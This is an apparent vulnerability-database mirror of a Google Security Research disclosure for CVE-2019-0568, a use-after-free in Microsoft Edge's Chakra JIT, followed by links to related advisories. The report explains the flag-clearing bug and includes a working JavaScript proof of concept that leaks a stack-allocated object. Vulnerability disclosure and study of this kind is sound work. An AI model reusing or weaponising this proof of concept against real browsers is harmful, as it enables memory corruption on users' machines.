Lucene search
Google Security ResearchPACKETSTORM:151222HistoryJan 17, 2019 - 12:00 a.m.
Microsoft Edge Chakra JIT Use-After-Free / Flag Issue
2019-01-1700:00:00
Google Security Research
packetstormsecurity.com
63
0.967 High
EPSS
Percentile
99.6%
`Microsoft Edge: Chakra: JIT: JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode just clears DisableImplicitFlags
CVE-2019-0568
The JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js which initializes some builtin objects. Because it's essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is, it doesn't restore the prevous status of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.
To exploit this bug, it's needed to build a chain that first clears the flag by calling the vulnerable method and then leaks the stack-allocated object. This is done with the Error.prototype.toString method (marked as having no side effects) which calls the "toString" method on the "name" property and the "message" property of the "this" object. So when it accesses the "name" property, it clears the flag and leaks the "this" object when it accesses the "message" property.
PoC:
function opt() {
let o = {}; // stack-allocated object
o.x; // under with DisableImplicitFlags set
}
function main() {
for (let i = 0; i < 10000; i++) {
opt();
}
let leaked_stack_object = null;
let object_prototype = ({}).__proto__;
object_prototype.__defineGetter__('x', Error.prototype.toString);
object_prototype.__defineGetter__('message', function () {
delete object_prototype.message;
leaked_stack_object = this;
});
object_prototype.name = Array.prototype; // access to Array.prototype will call JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode.
opt();
alert(leaked_stack_object);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
Found by: lokihardt
`
Related
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Chakra Scripting Engine Memory Corruption (CVE-2019-0568)
2019-01-08 00:00:00
zdt
zdt
myhack58
myhack58
symantec
symantec
mscve
mscve
Chakra Scripting Engine Memory Corruption Vulnerability
2019-01-08 08:00:00
veracode
veracode
Remote Code Execution (RCE)
2019-01-09 03:10:51
Remote Code Execution (RCE)
2019-01-09 02:32:58
Remote Code Execution (RCE)
2019-01-09 03:01:06
cve
cve
github
github
ChakraCore RCE Vulnerability
2022-05-13 01:21:15
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
prion
prion
Remote code execution
2019-01-08 21:29:00
Remote code execution
2019-01-08 21:29:00
Remote code execution
2019-01-08 21:29:00
osv
osv
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
ChakraCore RCE Vulnerability
2022-05-13 01:21:15
ChakraCore RCE Vulnerability
2022-05-13 01:21:17
kaspersky
kaspersky
KLA11397 Multiple vulnerabilities in Microsoft Browsers
2019-01-08 00:00:00
threatpost
threatpost
Microsoft Issues Multiple Critical Patches for Edge Browser
2019-01-08 20:49:06
mskb
mskb
January 8, 2019âKB4480116 (OS Build 17763.253)
2019-01-08 08:00:00
January 8, 2019âKB4480966 (OS Build 17134.523)
2019-01-08 08:00:00
nessus
nessus
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4480116)
2019-01-09 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4480966)
2019-01-09 00:00:00
talosblog
talosblog